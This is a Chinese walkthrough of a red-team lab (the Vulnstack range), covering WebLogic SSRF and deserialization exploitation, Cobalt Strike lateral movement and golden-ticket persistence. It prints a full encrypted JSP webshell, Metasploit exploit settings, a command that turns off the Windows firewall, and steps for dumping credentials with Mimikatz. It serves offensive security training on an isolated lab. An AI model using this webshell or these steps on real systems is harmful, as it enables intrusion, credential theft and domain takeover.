ATT&CK实战系列——红队实战(二)

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
拓扑结构大体如下:
ATT&CK实战系列——红队实战(二)_第1张图片

靶机下载地址: https://pan.baidu.com/s/13nU-0vsGBnGejGCKzwphfQ&shfl=sharepset
提取码:41y6
开机密码:1qaz@WSX

因为要搭建一个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。

DC配置 :DC是域控,只能内网访问,只有一块网卡,设置如下:
ATT&CK实战系列——红队实战(二)_第2张图片
ATT&CK实战系列——红队实战(二)_第3张图片
PC配置:两块网卡,一块NAT模式(模拟外网连接),一块自定义模式(同DC,模拟内网域)
ATT&CK实战系列——红队实战(二)_第4张图片
ATT&CK实战系列——红队实战(二)_第5张图片

WEB配置:两块网卡,一块NAT模式,一块自定义模式(同DC)
(初始的状态默认密码无法登录,切换用户 de1ay/de1ay 登录进去)
ATT&CK实战系列——红队实战(二)_第6张图片
DC: delay\delay
PC: delay\mssql
WEB:delay\delay

先从WEB机开始,注意需要手动开启服务,路径如下:
C:\Oracle\Middleware\user_projects\domains\base_domain\bin下有一个startWeblogic的批处理,管理员身份运行它即可,管理员账号密码:Administrator/1qaz@WSX
ATT&CK实战系列——红队实战(二)_第7张图片
ATT&CK实战系列——红队实战(二)_第8张图片

遇到的坑 NAT模式设置如下,不然到时候访问不到地址!!
ATT&CK实战系列——红队实战(二)_第9张图片
计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动(Computer Browser 一直自动关闭导致 net view 显示 6118 error 没能解决,在域信息收集时暂时关闭一下防火墙)

至此环境配置完毕

外网渗透

已知web服务器ip地址:192.168.111.80
拿到环境后,首先进行端口探测,这里使用-sS参数,由于防火墙的存在不能使用icmp包,所以使用syn包探测
nmap -sS -sV , -sS 使用SYN半开式扫描,又称隐身扫描 -sV 服务探测
nmap -sS -sV 192.168.111.80
ATT&CK实战系列——红队实战(二)_第10张图片
通过扫描端口,我们通过端口初步判断目标机存在的服务及可能存在的漏洞,如445端口开放就意味着存smb服务,存在smb服务就可能存在ms17-010/端口溢出漏洞。开放139端口,就存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞。开放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。开放3389端口,就存在远程桌面。开放7001端口就存在weblogic。

这里先看一下weblogic,直接使用 WeblogicScan 扫描一下可能存在的漏洞,工具地址:
https://gitee.com/opticfiber/WeblogicScan/repository/archive/master.zip
python WeblogicScan.py 192.168.111.80 7001

https://github.com/rabbitmask/WeblogicScan
用法 python3 WeblogicScan.py -u 192.168.111.80 -p 7001
ATT&CK实战系列——红队实战(二)_第11张图片

扫描存在如下漏洞

SSRF CVE-2019-2725  CVE-2019-2729

SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因为他是有服务器端发起的,所以他能够请求到与他相连而与外网隔离的内部系统)

SSRF漏洞存在于http://192.168.111.80:7001/uddiexplorer/SearchPublicRegistries.jsp

ATT&CK实战系列——红队实战(二)_第12张图片
点击Search抓包测试
ATT&CK实战系列——红队实战(二)_第13张图片
就是这里可以进行端口探测,这里的参数operator我们是可控的,当我们输入不同值时可得到多种不同的报错

当我们访问一个不存在的端口时,比如 http://127.0.0.1:1234
ATT&CK实战系列——红队实战(二)_第14张图片
将会返回:could not connect over HTTP to server

当我们访问存在的端口时,比如 http://127.0.0.1:7001
ATT&CK实战系列——红队实战(二)_第15张图片
可访问的端口将会得到错误,一般是返回status code,如果访问的非http协议,则会返回:did not have a valid SOAP content-type

https://www.cnblogs.com/bmjoker/p/9759761.html
https://blog.csdn.net/LTtiandd/article/details/99592832

既然存在CVE-2019-2729Weblogic反序列化漏洞,那么直接使用 java 反序列化终极测试工具测试漏洞
ATT&CK实战系列——红队实战(二)_第16张图片
ATT&CK实战系列——红队实战(二)_第17张图片
上传冰蝎马,关于选择 webshell 上传路径问题,参考 https://www.cnblogs.com/sstfy/p/10350915.html

上传路径为:

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp

冰蝎shell

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

ATT&CK实战系列——红队实战(二)_第18张图片
冰蝎连接 http://192.168.111.80:7001/uddiexplorer/shell.jsp 密码:pass
在这里插入图片描述
然后我们再试试CVE-2019-2725这个RCE漏洞

search weblogic_deserialize_asyncresponseservice
ATT&CK实战系列——红队实战(二)_第19张图片
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
在这里插入图片描述
show options 查看一些参数
ATT&CK实战系列——红队实战(二)_第20张图片
set rhosts 192.168.111.80
set lhost 192.168.111.128
set target 1
ATT&CK实战系列——红队实战(二)_第21张图片

内网渗透

这里不多bb先直接把CS启动起再说,服务端启动
ATT&CK实战系列——红队实战(二)_第22张图片
客户端启动
ATT&CK实战系列——红队实战(二)_第23张图片
ATT&CK实战系列——红队实战(二)_第24张图片
创建一波监听
ATT&CK实战系列——红队实战(二)_第25张图片
生成CS后门并上传
ATT&CK实战系列——红队实战(二)_第26张图片
上线CS
ATT&CK实战系列——红队实战(二)_第27张图片
ATT&CK实战系列——红队实战(二)_第28张图片
Run Mimikatz
ATT&CK实战系列——红队实战(二)_第29张图片
提权到system
ATT&CK实战系列——红队实战(二)_第30张图片
ATT&CK实战系列——红队实战(二)_第31张图片
信息收集

查看域名 net config workstation
查看有几个域  net view /domain
查看域内主机  net view
查询域内用户   net user /domain #该命令在本环境中需要在system权限下执行
查看域管理员   net group "domain admins" /domain  
查看域控    net group "domain controllers" /domain  

ipconfig /all,发现机器有双网卡,内网 10.10.10.1/24 网段,域控 ip 10.10.10.10 (域控一般是本机的DNS服务器)
ATT&CK实战系列——红队实战(二)_第32张图片关闭防火墙 netsh advfirewall set allprofiles state off
ATT&CK实战系列——红队实战(二)_第33张图片

Ladon 10.10.10.0/24 OnlinePC  # 多协议探测存活主机(IP、机器名、MAC地址、制造商)
Ladon 10.10.10.0/24 OsScan #多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)

ATT&CK实战系列——红队实战(二)_第34张图片
ATT&CK实战系列——红队实战(二)_第35张图片

psexec 传递
psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。

获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口

命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程

例如:portscan 10.10.10.0/24 445 arp 200

ATT&CK实战系列——红队实战(二)_第36张图片可看到域控机器DC开放了445端口

工具栏 View->Targets 查看端口探测后的存活主机
在这里插入图片描述
横向移动

横向渗透概念:
横向渗透攻击技术是复杂网络攻击中广泛使用的一种技术,特别是在高级持续威胁(Advanced Persistent Threats,APT)中更加热衷于使用这种攻击方法。攻击者可以利用这些技术,以被攻陷的系统为跳板,访问其他主机,获取包括邮箱、共享文件夹或者凭证信息在内的敏感资源。攻击者可以利用这些敏感信息,进一步控制其他系统、提升权限或窃取更多有价值的凭证。借助此类攻击,攻击者最终可能获取域控的访问权限,完全控制基于Windows系统的基础设施或与业务相关的关键账户。
在提权后,我们可以用mimikatz dump目标机的凭证,并进行内网横向移动

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
ATT&CK实战系列——红队实战(二)_第37张图片
psexec横向移动
ATT&CK实战系列——红队实战(二)_第38张图片
DC成功上线
ATT&CK实战系列——红队实战(二)_第39张图片
ATT&CK实战系列——红队实战(二)_第40张图片

拿下域控

权限维持

在域控获得KRBTGT账户NTLM密码哈希和SID
ATT&CK实战系列——红队实战(二)_第41张图片
ATT&CK实战系列——红队实战(二)_第42张图片
黄金票据利用

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。

黄金票据的条件要求:

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。

WEB机 Administrator 权限机器->右键->Access->Golden Ticket
ATT&CK实战系列——红队实战(二)_第43张图片
ATT&CK实战系列——红队实战(二)_第44张图片伪造成功
ATT&CK实战系列——红队实战(二)_第45张图片
参考
https://www.cnblogs.com/wkzb/p/12826618.html
https://baijiahao.baidu.com/s?id=1686897854079644144&wfr=spider&for=pc
https://baijiahao.baidu.com/s?id=1686897854079644144&wfr=spider&for=pc
https://www.ghtwf01.cn/index.php/archives/632/

你可能感兴趣的:(渗透测试,安全)